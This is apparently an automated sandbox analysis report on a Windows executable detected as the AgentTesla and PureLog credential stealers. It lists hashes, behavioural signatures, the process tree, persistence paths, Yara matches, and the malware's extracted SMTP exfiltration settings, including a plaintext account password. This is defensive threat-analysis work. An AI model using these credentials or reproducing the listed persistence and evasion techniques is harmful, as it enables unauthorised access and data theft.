Edit tour

Windows Analysis Report
MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe

Overview

General Information

Sample name:	MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe
Analysis ID:	1558663
MD5:	e53eaa2914dc091f2e146b5665775eaa
SHA1:	e7431b4b6bd6ab4e55e5cea816407f4a22c733d8
SHA256:	9d954b672fcd0b4e6bdf5e34f0c27e8a8dd6e0984d28cfa27924dee457f34fcd
Infos:

Detection

AgentTesla, PureLog Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Sigma detected: Drops script at startup location

Yara detected AgentTesla

Yara detected PureLog Stealer

.NET source code contains method to dynamically call methods (often used by packers)

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Contains functionality to log keystrokes (.Net Source)

Drops VBS files to the startup folder

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Sample uses process hollowing technique

Sigma detected: WScript or CScript Dropper

Switches to a custom stack to bypass stack traces

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates processes with suspicious names

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Extensive use of GetProcAddress (often used to hide API calls)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evaded block containing many API calls

Found evasive API chain (date check)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May check the online IP address of the machine

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Suspicious Outbound SMTP Connections

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses SMTP (mail sending)

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe (PID: 3744 cmdline: "C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe" MD5: E53EAA2914DC091F2E146B5665775EAA)

juvenile.exe (PID: 3700 cmdline: "C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe" MD5: E53EAA2914DC091F2E146B5665775EAA)

RegSvcs.exe (PID: 6552 cmdline: "C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

juvenile.exe (PID: 2544 cmdline: "C:\Users\user\AppData\Local\cyclop\juvenile.exe" MD5: E53EAA2914DC091F2E146B5665775EAA)

RegSvcs.exe (PID: 2948 cmdline: "C:\Users\user\AppData\Local\cyclop\juvenile.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

wscript.exe (PID: 6528 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\juvenile.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

juvenile.exe (PID: 2300 cmdline: "C:\Users\user\AppData\Local\cyclop\juvenile.exe" MD5: E53EAA2914DC091F2E146B5665775EAA)

RegSvcs.exe (PID: 5724 cmdline: "C:\Users\user\AppData\Local\cyclop\juvenile.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

juvenile.exe (PID: 2612 cmdline: "C:\Users\user\AppData\Local\cyclop\juvenile.exe" MD5: E53EAA2914DC091F2E146B5665775EAA)

RegSvcs.exe (PID: 5676 cmdline: "C:\Users\user\AppData\Local\cyclop\juvenile.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.privateemail.com", "Username": "pin@hm-heating-de.icu", "Password": "mGr{)g5TVG3j"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000007.00000002.2303120094.0000000002080000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 58 88 44 24 2B 88 44 24 2F B0 8B 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
00000005.00000002.2334390218.0000000002C7F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.2334390218.0000000002C7F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000005.00000002.2334390218.0000000002C7F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000005.00000002.2335172794.0000000003045000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000005.00000002.2336361371.0000000003FE5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.2336361371.0000000003FE5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000005.00000002.2336361371.0000000003FE5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000004.00000002.2202431029.0000000003840000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 58 88 44 24 2B 88 44 24 2F B0 8B 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
00000005.00000002.2337231553.0000000005560000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.2337231553.0000000005560000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000005.00000002.2337231553.0000000005560000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000005.00000002.2337231553.0000000005560000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x4052d:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x4059f:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x40629:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x406bb:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x40725:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x40797:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x4082d:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x408bd:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
00000005.00000002.2322641026.0000000000400000.00000040.80000000.00040000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 58 88 44 24 2B 88 44 24 2F B0 8B 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
00000002.00000002.2175869516.0000000000F20000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 58 88 44 24 2B 88 44 24 2F B0 8B 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
00000009.00000002.2321963047.0000000003C30000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 58 88 44 24 2B 88 44 24 2F B0 8B 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
0000000B.00000002.3396205301.000000000330A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000002.3396205301.000000000330A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000005.00000002.2335172794.000000000301A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.2335172794.000000000301A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000005.00000002.2338131116.00000000056F0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.2338131116.00000000056F0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000005.00000002.2338131116.00000000056F0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000005.00000002.2338131116.00000000056F0000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3f645:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3f6b7:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3f741:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x3f7d3:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3f83d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3f8af:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x3f945:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x3f9d5:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0000000B.00000002.3396205301.0000000003335000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: RegSvcs.exe PID: 2948	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 2948	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: RegSvcs.exe PID: 5676	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 5676	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 24 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
9.2.juvenile.exe.3c30000.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 58 88 44 24 2B 88 44 24 2F B0 8B 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
5.2.RegSvcs.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 58 88 44 24 2B 88 44 24 2F B0 8B 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
5.2.RegSvcs.exe.3fe6458.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.RegSvcs.exe.3fe6458.4.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
5.2.RegSvcs.exe.3fe6458.4.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
5.2.RegSvcs.exe.3fe6458.4.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3d845:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3d8b7:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3d941:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x3d9d3:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3da3d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3daaf:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x3db45:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x3dbd5:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
5.2.RegSvcs.exe.4033190.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.RegSvcs.exe.4033190.3.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
5.2.RegSvcs.exe.4033190.3.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
5.2.RegSvcs.exe.4033190.3.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3d845:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3d8b7:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3d941:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x3d9d3:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3da3d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3daaf:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x3db45:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x3dbd5:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
5.2.RegSvcs.exe.5560000.7.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.RegSvcs.exe.5560000.7.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
5.2.RegSvcs.exe.5560000.7.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
5.2.RegSvcs.exe.2cbf09e.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.RegSvcs.exe.2cbf09e.2.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
5.2.RegSvcs.exe.2cbf09e.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
5.2.RegSvcs.exe.5560000.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x4052d:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x4059f:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x40629:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x406bb:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x40725:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x40797:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x4082d:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x408bd:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
5.2.RegSvcs.exe.2cbf09e.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x4052d:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x4059f:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x40629:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x406bb:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x40725:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x40797:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x4082d:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x408bd:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
5.2.RegSvcs.exe.5560ee8.6.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.RegSvcs.exe.5560ee8.6.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
5.2.RegSvcs.exe.5560ee8.6.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
5.2.RegSvcs.exe.5560ee8.6.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3d845:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3d8b7:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3d941:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x3d9d3:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3da3d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3daaf:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x3db45:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x3dbd5:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
5.2.RegSvcs.exe.2cbf09e.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.RegSvcs.exe.2cbf09e.2.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
5.2.RegSvcs.exe.2cbf09e.2.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
5.2.RegSvcs.exe.2cbf09e.2.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3e72d:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3e79f:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3e829:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x3e8bb:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3e925:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3e997:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x3ea2d:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x3eabd:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
2.2.juvenile.exe.f20000.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 58 88 44 24 2B 88 44 24 2F B0 8B 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
5.2.RegSvcs.exe.5560ee8.6.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.RegSvcs.exe.5560ee8.6.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
5.2.RegSvcs.exe.5560ee8.6.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
5.2.RegSvcs.exe.5560ee8.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3f645:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3f6b7:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3f741:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x3f7d3:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3f83d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3f8af:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x3f945:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x3f9d5:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
5.2.RegSvcs.exe.3fe5570.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.RegSvcs.exe.3fe5570.5.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
5.2.RegSvcs.exe.3fe5570.5.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
5.2.RegSvcs.exe.3fe5570.5.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3e72d:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3e79f:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3e829:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x3e8bb:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3e925:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3e997:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x3ea2d:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x3eabd:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
